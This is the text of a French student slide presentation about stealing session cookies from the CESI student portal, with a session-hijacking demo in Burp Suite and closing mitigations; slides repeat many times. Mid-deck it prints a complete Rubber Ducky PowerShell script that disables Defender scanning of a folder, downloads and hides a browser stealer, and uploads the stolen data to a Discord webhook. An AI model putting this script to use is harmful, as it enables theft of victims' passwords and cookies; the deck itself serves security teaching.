J'AI HACKÉ LE CESI !!!
J'AI HACKÉ LE CESI !!!
instance.set(START);
- Quelques mots sur les authentifications
- Sont-elles sécurisées ?
- Quelle sécurité est implémentée sur l'ent du CESI ?
- Comment récupérer les cookies de la victime ?
- Démonstration
- Comment cela peut être résolu ?
LES AUTHENTIFICATIONS
AU MENU DU JOUR...
J'AI HACKÉ LE CESI !!!
J'AI HACKÉ LE CESI !!!
instance.set(MENU);
J'AI HACKÉ LE CESI !!!
J'AI HACKÉ LE CESI !!!
LES AUTHENTIFICATIONS
instance.set(DEFINITIONS);
EST-CE SÉCURISÉ ?
- Quelques mots sur les authentifications
- Sont-elles sécurisées ?
- Quelle sécurité est implémentée sur l'ent du CESI ?
- Comment récupérer les cookies de la victime ?
- Démonstration
- Comment cela peut être résolu ?
J'AI HACKÉ LE CESI !!!
J'AI HACKÉ LE CESI !!!
LES AUTHENTIFICATIONS
Mr.Robot
E Corp
et leur sécurités
"compte de Tyrell.Wellick@e.corp.com"
instance.set(DEFINITIONS);
- Quelques mots sur les authentifications
- Sont-elles sécurisées ?
- Quelle sécurité est implémentée sur l'ent du CESI ?
- Comment récupérer les cookies de la victime ?
- Démonstration
- Comment cela peut être résolu ?
LES AUTHENTIFICATIONS
Mr.Robot
E Corp
"compte de Tyrell.Wellick@e.corp.com"
"ok, mais c'est quoi le mot de passe ?"
et leur sécurités
instance.set(DEFINITIONS);
- Quelques mots sur les authentifications
- Sont-elles sécurisées ?
- Quelle sécurité est implémentée sur l'ent du CESI ?
- Comment récupérer les cookies de la victime ?
- Démonstration
- Comment cela peut être résolu ?
LES AUTHENTIFICATIONS
"ok, mais c'est quoi le mot de passe ?"
Mr.Robot
E Corp
et leur sécurités
instance.set(DEFINITIONS);
- Quelques mots sur les authentifications
- Sont-elles sécurisées ?
- Quelle sécurité est implémentée sur l'ent du CESI ?
- Comment récupérer les cookies de la victime ?
- Démonstration
- Comment cela peut être résolu ?
LES AUTHENTIFICATIONS
"Tyrell_Wellick_best_COO"
Mr.Robot
E Corp
et leur sécurités
instance.set(DEFINITIONS);
- Quelques mots sur les authentifications
- Sont-elles sécurisées ?
- Quelle sécurité est implémentée sur l'ent du CESI ?
- Comment récupérer les cookies de la victime ?
- Démonstration
- Comment cela peut être résolu ?
LES AUTHENTIFICATIONS
"Non"
Mr.Robot
E Corp
et leur sécurités
instance.set(DEFINITIONS);
- Quelques mots sur les authentifications
- Sont-elles sécurisées ?
- Quelle sécurité est implémentée sur l'ent du CESI ?
- Comment récupérer les cookies de la victime ?
- Démonstration
- Comment cela peut être résolu ?
LES AUTHENTIFICATIONS
"supprime le compte"
Mr.Robot
E Corp
et leur sécurités
instance.set(DEFINITIONS);
- Quelques mots sur les authentifications
- Sont-elles sécurisées ?
- Quelle sécurité est implémentée sur l'ent du CESI ?
- Comment récupérer les cookies de la victime ?
- Démonstration
- Comment cela peut être résolu ?
"fu"
Mr.Robot
E Corp
Quelle sécurité est implémenté au sein de l'ent du CESI ?
LES AUTHENTIFICATIONS
EST-CE SÉCURISÉ ?
instance.set(SECURITY);
"fu"
Mr.Robot
E Corp
BROWSER
SERVER
roadmap.sh/login
rd1o00000....
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(SECURITY);
"fu"
Mr.Robot
E Corp
BROWSER
SERVER
roadmap.sh/login
Crée une Session
{ id: ...; email: ... }
rd1o00000....
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(SECURITY);
"fu"
Mr.Robot
E Corp
BROWSER
SERVER
roadmap.sh/login
{ id: ...; email: ... }
rd1o00000....
Crée une Session
Crée un ID de Session
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(SECURITY);
"fu"
Mr.Robot
E Corp
BROWSER
SERVER
roadmap.sh/login
{ id: ...; email: ... }
rd1o00000....
rd1o00000....
Crée une Session
Crée un ID de Session
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(SECURITY);
"fu"
Mr.Robot
E Corp
BROWSER
SERVER
roadmap.sh/login
{ id: ...; email: ... }
rd1o00000....
rd1o00000....
roadmap.sh/update-profile
Crée une Session
Crée un ID de Session
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(SECURITY);
"fu"
Mr.Robot
E Corp
BROWSER
SERVER
roadmap.sh/login
{ id: ...; email: ... }
rd1o00000....
rd1o00000....
roadmap.sh/update-profile
Crée une Session
Crée un ID de Session
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(SECURITY);
"fu"
Mr.Robot
E Corp
BROWSER
SERVER
roadmap.sh/login
{ id: ...; email: ... }
rd1o00000....
rd1o00000....
roadmap.sh/update-profile
Crée une Session
Crée un ID de Session
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(SECURITY);
"fu"
Mr.Robot
E Corp
BROWSER
SERVER
roadmap.sh/login
{ id: ...; email: ... }
rd1o00000....
rd1o00000....
roadmap.sh/update-profile
Crée une Session
Crée un ID de Session
Hello friend...
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(SECURITY);
"fu"
Mr.Robot
E Corp
SERVER
BROWSER
Hello friend...
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(HELLO_FRIEND);
"fu"
Mr.Robot
E Corp
SERVER
BROWSER
Hello friend...
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(CONTROL_IS_AN_ILLUSION);
"fu"
Mr.Robot
E Corp
SERVER
roadmap.sh/login
BROWSER
crée une copie de l'identifiant de session
Crée une Session
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(CONTROL_IS_AN_ILLUSION);
"fu"
Mr.Robot
E Corp
SERVER
roadmap.sh/login
BROWSER
crée une copie de l'identifiant de session
Crée une Session
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(USE_ILLUSION_TO_GAIN_CONTROL);
"fu"
Mr.Robot
E Corp
SERVER
roadmap.sh/login
BROWSER
crée une copie de l'identifiant de session
roadmap.sh/delete_account
Crée une Session
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(USE_ILLUSION_TO_GAIN_CONTROL);
"fu"
Mr.Robot
E Corp
SERVER
roadmap.sh/login
BROWSER
crée une copie de l'identifiant de session
roadmap.sh/delete_account
Crée une Session
Supprime le compte
Ceci peut être un simple Wi-Fi public
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(USE_ILLUSION_TO_GAIN_CONTROL);
"fu"
Mr.Robot
E Corp
SERVER
roadmap.sh/login
BROWSER
crée une copie de l'identifiant de session
roadmap.sh/delete_account
Crée une Session
Supprime le compte
Ceci peut être qu'un simple Wi-Fi publique
EST-CE SÉCURISÉ ?
ent.cesi.fr
instance.set(DONT_MISTAKE_MY_GENEROSITY_FOR_GENEROSITY);
"fu"
Mr.Robot
instance.set(SECURITY_CESI);
Quelle sécurité est implémenté au sein de l'ent du CESI ?
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
"fu"
Mr.Robot
instance.set(SECURITY_CESI);
Quelle sécurité est implémenté au sein de l'ent du CESI ?
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
adresse mail et autre IDs visiblent dans l'url requête
adresse mail et mot de passe visiblent en clair dans le contenu de la requête
"fu"
Mr.Robot
instance.set(SECURITY_CESI);
Quelle sécurité est implémenté au sein de l'ent du CESI ?
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
token d'identification en clair dans les cookies
"fu"
Mr.Robot
instance.set(SECURITY_CESI);
Quelle sécurité est implémenté au sein de l'ent du CESI ?
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Bref, pas bon signe... pour le CESI
"fu"
Mr.Robot
instance.set(COOKIES_WA_OISHII_DESU);
Comment récupérer ces cookies ??
Démonstration !!
Quelle sécurité est implémenté au sein de l'ent du CESI ?
"fu"
Mr.Robot
instance.set(COOKIES_WA_OISHII_DESU);
Comment récupérer ces cookies ??
Démonstration !!
Quelle sécurité est implémenté au sein de l'ent du CESI ?
1. Avec accès physique
2. Sans accès physique
Rubber Ducky
"fu"
Mr.Robot
instance.set(COOKIES_WA_OISHII_DESU);
Comment récupérer ces cookies ??
Démonstration !!
Quelle sécurité est implémenté au sein de l'ent du CESI ?
1. Avec accès physique
2. Sans accès physique
Rubber Ducky
"fu"
Mr.Robot
instance.set(COOKIES_WA_OISHII_DESU);
Comment récupérer ces cookies ??
Démonstration !!
Quelle sécurité est implémenté au sein de l'ent du CESI ?
1. Avec accès physique
2. Sans acces physique
Rubber Ducky
"fu"
Mr.Robot
instance.set(COOKIES_WA_OISHII_DESU);
Comment récupérer ces cookies ??
Démonstration !!
Quelle sécurité est implémenté au sein de l'ent du CESI ?
1. Avec accès physique
2. Sans accès physique
Rubber Ducky
"fu"
Mr.Robot
instance.set(COOKIES_WA_OISHII_DESU);
Comment récupérer ces cookies ??
Démonstration !!
Quelle sécurité est implémenté au sein de l'ent du CESI ?
1. Avec accès physique
2. Sans accès physique
Man In The Middle
Rubber Ducky
REM password steal
GUI r
DELAY 500
STRING powershell
CTRL-SHIFT ENTER
DELAY 500
STRING function Upload-Discord {
ENTER
STRING [CmdletBinding()]
ENTER
STRING param (
ENTER
STRING [parameter(Position=0,Mandatory=$False)]
ENTER
STRING [string]$file,
ENTER
STRING [parameter(Position=1,Mandatory=$False)]
ENTER
STRING [string]$text
ENTER
STRING )
ENTER
STRING $hookurl = '<your_Discord_web_hook>'
ENTER
STRING $Body = @{
ENTER
STRING 'username' = $env:username
ENTER
STRING 'content' = $text
ENTER
STRING }
ENTER
STRING if (-not ([string]::IsNullOrEmpty($text))){
ENTER
STRING Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
ENTER
STRING if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
ENTER
STRING }
ENTER
REM Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download
STRING Add-MpPreference -ExclusionPath $env:tmp
ENTER
REM Download the exe and save it to temp directory
STRING iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe"
ENTER
REM Execute the Browser Stealer
STRING cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait
ENTER
REM Exfiltrate the loot to discord
STRING Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip
ENTER
STRING Upload-Discord -file "$env:tmp\browserdata.zip"
ENTER"fu"
Mr.Robot
instance.set(COOKIES_WA_OISHII_DESU);
Comment récupérer ces cookies ??
Démonstration !!
Quelle sécurité est implémenté au sein de l'ent du CESI ?
1. Avec accès physique
2. Sans accès physique
Man In The Middle
Rubber Ducky
"fu"
Mr.Robot
instance.set(COOKIES_WA_OISHII_DESU);
Comment récupérer ces cookies ??
Démonstration !!
Quelle sécurité est implémenté au sein de l'ent du CESI ?
1. Avec accès physique
2. Sans accès physique
Man In The Middle
SERVER
BROWSER
Hello friend...
"fu"
Mr.Robot
instance.set(COOKIES_WA_OISHII_DESU);
Comment récupérer ces cookies ??
Démonstration !!
Quelle sécurité est implémenté au sein de l'ent du CESI ?
1. Avec accès physique
2. Sans accès physique
Man In The Middle
SERVER
BROWSER
Hello friend...
Facile, toutes les donnée sont en texte clair
"fu"
Mr.Robot
instance.set(DEMONSTRATION);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
"fu"
Mr.Robot
instance.set(DEMONSTRATION);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
Connexion a l'ENT depuis chrome
"fu"
Mr.Robot
instance.set(DEMONSTRATION);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
Récuperation des cookies valides
(simulation d'un hack)
"fu"
Mr.Robot
instance.set(DEMONSTRATION);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
Connexion à l'ENT (https://ent.cesi.fr/accueil-apprenant) depuis Burp Suite
"fu"
Mr.Robot
instance.set(DEMONSTRATION);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
Cookies donnés par l'ENT
"fu"
Mr.Robot
instance.set(DEMONSTRATION);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
Changement des cookies par ceux valides
"fu"
Mr.Robot
instance.set(DEMONSTRATION);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
Envoie de la requête
"fu"
Mr.Robot
instance.set(DEMONSTRATION);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
accès à l'ENT de la "victime"
"fu"
Mr.Robot
instance.set(FIX);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
Contre la récupération des cookies :
contre une attaque man in the middle:
Activer le SSL (Secure Socket Layer)
The End
"fu"
Mr.Robot
instance.set(FIX);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
Contre la récupération des cookies :
contre une attaque man in the middle:
Activer le SSL (Secure Socket Layer)
contre une attaque physique:
Jamais laisser son ordinateur déverrouillé sans surveillance
Jamais brancher de clés USB inconnue
"fu"
Mr.Robot
instance.set(FIX);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
Contre la récupération des cookies :
Activer le SSL (Secure Socket Layer)
contre une attaque man in the middle:
contre une attaque physique:
Jamais laisser son ordinateur déverrouillé sans surveillance
Jamais brancher de clés USB inconnue
Du côté du site WEB :
Garder en mémoire l'adresse IP lors de l'autentification
A chaque actions de l'utilisateur, une vérification de cette IP peut être faite.
"fu"
Mr.Robot
instance.set(FIX);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
Contre la récupération des cookies :
Activer le SSL (Secure Socket Layer)
contre une attaque man in the middle:
contre une attaque physique:
Jamais laisser son ordinateur déverrouillé sans surveillance
Jamais brancher de clés USB inconnue
Du côté du site WEB :
Garder en mémoire l'adresse IP lors de l'autentification
A chaque actions de l'utilisateur, une vérification de cette IP peut être faite.
Mais cela ne serait pas effectif si la victime et le hacker se trouvent dans le même réseaux (wifi publique, wifi corporate, ...)
Ou si l'utilisateur change régulièrement d'adresse IP (réseaux mobile, utilisation d'un VPN, ...)
"fu"
Mr.Robot
instance.set(FIX);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
Du côté du site WEB :
Garder en mémoire l'adresse IP lors de l'autentification
A chaque actions de l'utilisateur, une vérification de cette IP peut être faite.
Mais cela ne serait pas effectif si la victime et le hacker se trouvent dans le même réseaux (wifi publique, wifi corporate, ...)
Ou si l'utilisateur change régulièrement d'adresse IP (réseaux mobile, utilisation d'un VPN, ...) il devra constament se reconnecter
Généralement, plus un service est facile d'utilisation, plus il est difficile de le sécuriser efficacement
"fu"
Mr.Robot
instance.set(FIX);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Démonstration !!
Un patch ?
Du côté du site WEB :
Garder en mémoire l'adresse IP lors de l'autentification
A chaque actions de l'utilisateur, une vérification de cette IP peut être faite.
Mais cela ne serait pas effectif si la victime et le hacker se trouvent dans le même réseaux (wifi publique, wifi corporate, ...)
Ou si l'utilisateur change régulièrement d'adresse IP (réseaux mobile, utilisation d'un VPN, ...) il devra constament se reconnecter
Généralement, plus un service est facile d'utilisation, plus il est difficile de le sécuriser efficacement
"fu"
Mr.Robot
instance.set(END);
ent.cesi.fr
EST-CE SÉCURISÉ ?
Comment récupérer ces cookies ??
Un patch ?
The End